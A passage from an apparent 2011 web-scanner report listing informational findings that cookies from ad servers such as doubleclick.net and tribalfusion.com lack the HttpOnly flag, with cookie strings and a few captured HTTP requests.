ANON_ID=aSnermN3IdO9IdwKUNGF6K3SMvARsQTIPBNDfiG9vug6nk8TCZc5VyOrBJjGvQkUc8f4TyYxPVx5ER2fa87BPIslhpBT7dolqQw3qbqZcvZbLjoHM2Jwi6eBruiWQ1cqbl7Y4wgPRRmIYDWBcKSMp19f0QbnrFFX2aFsqmAugmpnPaLbE5r6LFm0ny7ZdBjLUwfcJKXX36T4GaHGbBvbP3h5k6hP6nLwDpOlZdZd8DHKWOQZcN7vuNGP82qNo4ZbwARVvHmEsHqXTaEVF3xxCm4m4yIPEmVXZcuDv1MRcZccKO9kZb0hslpZbbiiR6MVaD4GKNZd0QTos1qHleeZaZdx2RwXEnj6BSlUoUJ60sYbbWVBN2JHZb56rMS8xA0fsJ0Cf7T8ygmwbKPEXXXsiIFLLKyQMZafWjVuotmdwFDo9srsC3gcOufZaFTBRa21vX7nCjFU9O; path=/; domain=.tribalfusion.com; expires=Sun, 11-Sep-2011 11:03:08 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.14. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/j.ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ANON_ID=aunbZalwl6hwUQQwgQWaCFyUS7jC64OywUPxH2ILm35hSvP9FsxMpesmpvZcKIfCWWhrWEmo3P82WbGmlrZcx7bYZcZagpWnmhairy6ma7rJZb2NA6HsUJcwdNZbaPZbs2Nb2PgQrirwuO5T3mBsjwZc6n329ruwdYsDmIQ7to3tB6ZbwdyuKZdUaV6IeZa6gVVsdAjeJs9ZbZdtfPYtQy64XCxNZbT2vFeEwZcUhxDbMG3sd2QOYL4sMr8S6l69wgJv8EFFJpVNHeKr2s5HQjHcaZaCpNZbbEH2knc7WVZdZabLZbtd2tiHRgguDn7ZbQWcZadvasxxutMZbZc2ZaRSlNF5RWY19DxXQitC0MEEI47DNRp0PjrdGsSqaacIlhxZdI4vpqUc0rpTZc7aHdZbYPuRtTDii50fytO3ZdYrKafhLEVreCmBvXQYii; path=/; domain=.tribalfusion.com; expires=Sun, 11-Sep-2011 11:02:24 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.15. http://ad.afy11.net/ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.afy11.net
Path:	/ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s=1,2*4dd07bca*NvChYAti9s*0w_pNHxf_8VrLDq_uXx_kJUKiw==*,5*4dd6e1af*PUU08f4La8*LQiO98snWSTGG0FY8w==*,6*4de0098c*TwWpFxNd6J*fLFPASmaLni1foeSQ_vjnSAO1u5wSGan6LkNv_5Cw9cn0lidw85vRQ==*; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.16. http://ad.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UA=AAAAAQAUabUl55ctWfbz4_8QgoT4EM3BowwDA3gBY2BgYGJg2u7OwOqZzMBoHsLA8MuMgYGBk4GB0aBj17NXDEwZjxhYnv5iYFRbxcBwLx8mJ3NDdTmQDQa.X4MZGLgYGOQrGWUYGRhYNjCKAikGA0YGIJU.FSyoeIKRG8hbvhQst84DTEktYeQHCi46B1a5rJ5REMgD2_saYjIANIEckg--; Domain=.amgdgt.com; Expires=Wed, 13-Jul-2011 11:20:08 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/t=c/s=AAAAAQAUFng8aJLBZKJyWoaUyNqjOVxerAdnZW8sdXNhLHQsMTMwNzk2NDAxMjgxMCxjLDM0NTc2OCxwYyw3NzQ4MyxhYywxNjk5NzYsbyxOMC1TMCxsLDYyMTk1LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVjdWFkUTg1dE1FcUMuTVg2ZXFWMTU3Y1F2SkpuWlc4c2RYTmhMSFFzTVRNd056azJOREF3T0RFM01TeGpMRE0wTmpRMk55eHdZeXczT1Rjd01DeGhZeXd4TnpjNU9URXNieXhPTUMxVE1DeHNMRFkwTURVMExIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDBGQlFVRkJRVUZCUVVWQlFVRkJRVUZCUVVGQlVVRkJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSVDFRNVQxWjNVRnB3YTB4ZllYbEVSMjkyUW1SNU9XczRkbFpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDU1RsQlZVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVZaM2QwSkJaMVZEUVZGUlFVRkJRVUZQVW04eVlVRkJRVUZCUVM0dlkyNWtQU0ZpZDFoTVRGRnFZek5uVVZGNVQyZFlSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSmllRVpDV1Y5TU1WUmtla3BQVFhvNGJGRm1TbTFoU0hoRFRtWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRGRkVPRUZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFRm5RV0ZIY0hGaFluazRWR1I0WDBWQ0ptNTFiVDB4Sm5OcFp6MUJSMmxYY1hSNlkwTmxkMmhzU25sUGNsZzJOMGxMYVhWUVJGSlJjRFZOV1ZobkptTnNhV1Z1ZEQxallTMXdkV0l0TnpRNU5ERTFOakF5TnpBeE9ETTBNaVpoWkhWeWJEMEsvY2xrdXJsPQo-/clkurl=http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UA=AAAAAQAUhnQKQWw8iyMoLVi0cYxKHn4RAWwDA3gBY2BgYGdgmhjKwGorwsCo9ZSB4f09BgYGTgYGRoOO_acyGZj23WVgtZvPwGh_hIGRKQQhd.Qebn27XuLWt_UXA9P0HwysbisYGPVWMzB8.gw3c9dPTgam7e4MrJ7JDIzmQLt.mSHknr1iYMp4xMDy9BcDo9oqBoZ7.TA5mRuqy4FsZpzmHvj9Aae5u7V4cerbraoLNJfB92swAwM3A4N8JaMMIwMDywZGUSDFYMAItJIhfSpYUPEEIzdQcOEBRgYgtXwpWMk6DzAltYSRHyi46BxYblk9oyCQBwzeA78_goxnYAAAMUtW2g--; Domain=.amgdgt.com; Expires=Wed, 13-Jul-2011 11:26:46 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/t=c/s=AAAAAQAUcuadQ85tMEqC.MX6eqV157cQvJJnZW8sdXNhLHQsMTMwNzk2NDAwODE3MSxjLDM0NjQ2NyxwYyw3OTcwMCxhYywxNzc5OTEsbyxOMC1TMCxsLDY0MDU0LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0FBQUFBQUFBQUVBQUFBQUFBQUFBUUFBQUFHQm1aZ3BBcEhBOUN0Y2pFMENrY0QwSzF5TVRRT1Q5T1Z3UFpwa0xfYXlER292QmR5OWs4dlZOQUFBQUFJd3VBQUMxQUFBQWxnSUFBQUlBQUFCSTlBVUEwV01BQUFFQUFBQlZVMFFBVlZORUFOZ0NXZ0F6QzFnQVZ3d0JBZ1VDQVFRQUFBQUFPUm8yYUFBQUFBQS4vY25kPSFid1hMTFFqYzNnUVF5T2dYR05ISEFTQUEvcmVmZXJyZXI9aHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXMvY2xpY2tlbmM9aHR0cDovL2FkY2xpY2suZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJieEZCWV9MMVRkekpPTXo4bFFmSm1hSHhDTmZxLU5NQnI1NlU3QmpUeGUzVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjF2S0d5S1A4R29JQkYyTmhMWEIxWWkwM05EazBNVFUyTURJM01ERTRNelF5b0FIRDh2M3NBN0lCRDNkM2R5NTBkMkZqYTJ4bExtTnZiYm9CQ1RjeU9IZzVNRjloYzhnQkNkb0JJR2gwZEhBNkx5OTNkM2N1ZEhkaFkydHNaUzVqYjIwdmFHVmhaR3hwYm1Wem1BTFFEOEFDQk1nQ2hkTFBDcWdEQWVnRGlBTG9BN1VJOVFNQUFBREFnQWFHcHFhYnk4VGR4X0VCJm51bT0xJnNpZz1BR2lXcXR6Y0Nld2hsSnlPclg2N0lLaXVQRFJRcDVNWVhnJmNsaWVudD1jYS1wdWItNzQ5NDE1NjAyNzAxODM0MiZhZHVybD0K/clkurl=http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UA=AAAAAQAUIn3IhJ6M0baJsE3jqtdz8MMhcT0DA3gBY2BgYGdgmhjKwGorwsCo9ZSB4f09BgYGTgYGRoOO_acyGZj23WVgtZvPwGh_hIGRKQQhd.Qebn27XuLWt_UXA9P0HwysbisYGPVWMzB8.gw3c9dPTgam7e4MrJ7JDIzmQLt.mSHknr1iYMp4xMDy9BcDo9oqBoZ7.TA5mRuqy4FsZpx6D7Jk4ZTbrcWL0z27VXWB5jL4fg1mYOBmYJCvZJRhZGBg2cAoCqQYDBiBVjKkTwULKp5g5AYKLjzAyACkli8FK1nnAaakljDyAwUXnQPLLatnFATygMF7kCUbZDwDAwD4TFIM; Domain=.amgdgt.com; Expires=Wed, 13-Jul-2011 11:26:48 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.19. http://ad.doubleclick.net/ad/N2949.280881.BUZZMEDIA/B5492484.13 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/ad/N2949.280881.BUZZMEDIA/B5492484.13

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

id=cd8dec33800006c||t=1307964754|et=730|cs=qxekojto; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:32:34 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:32:34 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.20. http://ad.doubleclick.net/ad/N5762.1420.TIME.COM1/B5345366.23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/ad/N5762.1420.TIME.COM1/B5345366.23

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

id=c36cbc3380000fc||t=1307964182|et=730|cs=wi8qmwql; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:23:02 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:23:02 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.21. http://ad.doubleclick.net/ad/N5776.time.comOX3940/B5358797.2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/ad/N5776.time.comOX3940/B5358797.2

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

id=c37cbc3380000c9||t=1307964211|et=730|cs=jjlwaoki; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:23:31 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:23:31 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.22. http://ad.doubleclick.net/ad/N6457.131643.MEEBO/B4840137 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/ad/N6457.131643.MEEBO/B4840137

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

id=c13c6c3380000fd||t=1307964054|et=730|cs=jg0-yui3; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:20:54 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:20:54 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.23. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

id=cb231c43800000f||t=1307967399|et=730|cs=n7ym895z; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 12:16:39 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 12:16:39 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BxBFZpP_1TbyHBMPhlQex0pyMCafwhJkCr6v7qTXH3I3nWNCgngIQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfnvB-oAwHRA-DL25fwCQph6AOIAugDtQj1AwAAAMA&num=1&sig=AGiWqtxV29F3NdCJWLxuSilo3gOKcRXhzw&client=ca-pub-7494156027018342&adurl=;ord=1123029870? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307985395&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307967395234&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307967395282&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1840987920&ga_fc=1&u_tz=-300&u_his=16&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=93&xpc=Qu02yK2fdQ&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

13.24. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

id=c29dbc3380000d8||t=1307964640|et=730|cs=xuouziss; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:30:40 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:30:40 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=B0RX83fT1TYelF4_6lAfYna2LCqfwhJkC36X7qTXH3I3nWICD-QEQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIFyALX57wfqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE&num=1&sig=AGiWqtxAYnyItqIgOuFXpr8Jc_kU5dLbrQ&client=ca-pub-7494156027018342&adurl=;ord=1392015523? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307982636&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964636320&bpp=2&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307964636348&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1076203117&ga_fc=1&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=542&xpc=l1rYcbW4k3&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

13.25. http://ad.doubleclick.net/adi/N2998.specificmedia.com/B5470646.7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2998.specificmedia.com/B5470646.7

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

id=c7bd0c338000058||t=1307964365|et=730|cs=t1-9vary; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:26:05 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:26:05 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.26. http://ad.doubleclick.net/adi/N3093.2630.AKAMAITECHNOLOGIES/B4852598.3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3093.2630.AKAMAITECHNOLOGIES/B4852598.3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

id=c12c6c338000010||t=1307963967|et=730|cs=l5ucdxnk; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:19:27 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:19:27 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.27. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N447.153730.YAHOO.COM/B5548365.27

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

id=c12c6c3380000e3||t=1307964002|et=730|cs=nxaqmpvl; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:20:02 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:20:02 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.28. http://ad.doubleclick.net/adi/N553.Glam/B5345813.2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.Glam/B5345813.2

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

id=c34cbc338000074||t=1307964074|et=730|cs=nt4trr8i; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:21:14 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:21:14 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.29. http://ad.doubleclick.net/adi/N553.expedia.com/B5280302.8 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.expedia.com/B5280302.8

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

id=c32d4c33800005f||t=1307964456|et=730|cs=0refygag; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:27:36 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:27:36 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.30. http://ad.doubleclick.net/adi/N6090.218.9105273493621/B5528573.7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6090.218.9105273493621/B5528573.7

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

id=cae12c4380000a9||t=1307966476|et=730|cs=b68kiuvf; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 12:01:16 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 12:01:16 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.31. http://ad.doubleclick.net/adj/N3727.Expedia.com/B5235969.34 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3727.Expedia.com/B5235969.34

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

id=cbe27c438000036||t=1307967093|et=730|cs=12bhpdog; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 12:11:33 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 12:11:33 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.32. http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.10 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.10

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

id=c4679c43800006b||t=1307969540|et=730|cs=uaciighh; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 12:52:20 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 12:52:20 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.33. http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

id=cc8d5c338000030||t=1307964400|et=730|cs=x_fajlys; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:26:40 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:26:40 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.34. http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.7

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

id=c8ff4c3380000f6||t=1307965558|et=730|cs=jt1pje3v; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:45:58 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:45:58 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.35. http://ad.doubleclick.net/adj/N6294.149112.GLAMMEDIA.COM/B5303021.4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N6294.149112.GLAMMEDIA.COM/B5303021.4

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

id=c35cbc338000066||t=1307964115|et=730|cs=knafhrho; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:21:55 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:21:55 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.36. http://ad.doubleclick.net/adj/buz.idolator/content previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/buz.idolator/content

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

id=cd8dec338000050||t=1307964749|et=730|cs=0fe_sykh; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:32:29 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:32:29 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.37. http://ad.doubleclick.net/adj/cm.mtv/ent_010111 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/cm.mtv/ent_010111

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

id=c78d0c338000059||t=1307964234|et=730|cs=tfarooo8; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:23:54 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:23:54 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.38. http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/mtv.mtvi/atf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

id=c36cbc3380000b3||t=1307964171|et=730|cs=l3cprfmy; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:22:51 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:22:51 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.39. http://ad.doubleclick.net/adj/oiq.rmx/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/oiq.rmx/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

id=c12c6c3380000b0||t=1307963994|et=730|cs=zzlowqsy; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:19:54 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:19:54 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.40. http://ad.doubleclick.net/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/click

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

